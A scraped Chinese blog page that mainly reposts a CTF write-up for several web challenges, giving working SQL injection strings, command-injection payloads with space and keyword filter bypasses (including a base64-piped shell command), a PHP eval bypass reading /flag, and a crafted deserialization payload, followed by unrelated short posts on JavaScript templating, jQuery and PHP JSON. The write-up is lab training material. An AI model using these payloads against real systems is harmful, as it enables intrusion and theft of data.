直接上万能密码 用户随意 admin1' or 1; 开始正常注入: 查字段:1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表: [GXYCTF2019]Ping Ping Ping 考察:RCE的防护绕过 直接构造:?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格,使用拼接变量来拼接出Flag字符串: 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么:?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥,flag字眼也过滤了,bash也没了,不过sh没过滤: 继续构造payload: ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码,得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass,具体看这里 HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符2.将某些字符转换为下划线(包括空格) scandir():列出参数目录中的文件和目录 发现/被过滤了 ,可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload: 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典,要带路径 -r 递归跑(查到一个目录后,重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道,如果password=100,username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时,属性个数的值大于实际属性个数时,就可以 2.private修饰符的问题 private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover, 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法: flask session 伪造 具体,看这里 flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显: 1' uniunionon selselectect 1,2,3 over!正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接:https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-13 21:30:33
303
转载
HTML
...t代码转换为HTML字符串是构建动态网页内容的关键技术之一。随着现代Web应用日趋复杂和交互性增强,这一需求变得更加普遍且重要。近期,Vue.js、React和Angular等主流前端框架在模板渲染方面提供了更为强大且灵活的解决方案。 例如,Vue.js采用MVVM(Model-View-ViewModel)模式,并支持模板语法,开发者可以直接在HTML中插入可响应的数据绑定表达式,如{ {name} }和v-bind指令,框架会自动将其转化为对应的HTML字符串,实现数据与视图的实时同步更新。 同时,React推崇JSX语法,它允许开发者直接在JavaScript中编写类似HTML的结构,通过Babel编译器将其转化为React.createElement函数调用序列,最终生成HTML字符串。这种将模板与逻辑紧密耦合的方式有利于提升代码的可维护性和复用性。 深入研究,还可以发现诸如lit-html这样的轻量级库,它利用模板字面量和HTML模板化功能,结合高效的差异更新算法,在保证性能的同时简化了将JavaScript转为HTML字符串的过程。 总之,在当前前端开发领域,将JavaScript转换为HTML字符串不仅停留在原始的字符串拼接或模板字符串阶段,而是融入到各类现代框架的核心机制之中,以更高效、便捷的方式服务于复杂的Web应用开发实践。不断跟进和掌握这些新方法和技术趋势,有助于开发者提升项目质量和开发效率。
2023-11-22 11:28:15
474
电脑达人
JQuery
...过程中,常常需要处理字符串的操作,比如拆分字符串,提取其中的关键信息等等。而在实现这些操作时,jQuery提供的一些方法能够帮我们更加方便的进行处理。接下来我们就来介绍一下如何使用jQuery来按照指定的字符分隔字符串。 // 原字符串 var str = "hello,world,how,are,you"; // 使用split方法按照逗号分隔字符串成数组 var arr = str.split(','); // 循环打印出数组的元素 for(var i = 0; i< arr.length; i++){ console.log(arr[i]); } 在上面的代码中,我们首先定义了一个字符串变量str,然后使用split方法将字符串按照逗号分隔成数组arr。接着使用循环遍历数组中的元素,并打印出每一个元素的值。通过执行上面的代码,控制台输出将会是以下内容: hello world how are you 可以看到,我们已经成功的按照逗号分隔了字符串,并将每一个元素转换成了数组中的元素。这种方法可以应用于任意的字符串分隔操作,只需要将split方法中的分隔符改成需要的字符即可。 以上就是使用jQuery按照指定字符分隔字符串的方法,希望对你有所帮助!
2023-12-16 18:58:28
409
逻辑鬼才
JSON
...ork //将PHP数组变为JSON $myArray = array("name" =>"John", "age" =>30, "city" =>"New York"); $jsonData = json_encode($myArray); echo $jsonData; //显示 {"name":"John","age":30,"city":"New York"} //将JSON变为PHP数组 $jsonData = '{"name":"John", "age":30, "city":"New York"}'; $myArray = json_decode($jsonData, true); echo $myArray["name"]; //显示 John echo $myArray["age"]; //显示 30 echo $myArray["city"]; //显示 New York 以上代码示例展示了如何在PHP中对JSON进行解析和建立。通过json_decode函数,可以将JSON数据变为PHP对象或数组,然后通过对象或数组的方式即可访问相应的数据。而通过json_encode函数,可以将PHP数组变为JSON格式的字符串。 总的来说,对于PHP开发者而言,在处理前后端数据交互时,必须了解JSON这种数据格式及其相关的处理方式,以确保数据的正常传输和解析。
2023-01-18 13:53:09
461
算法侠
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
traceroute baidu.com
- 追踪到目标主机的网络路由路径。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
2023-04-28
2023-08-09
2023-06-18
2023-04-14
2023-02-18
2023-04-17
2024-01-11
2023-10-03
2023-09-09
2023-06-13
2023-08-07
2023-03-11
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"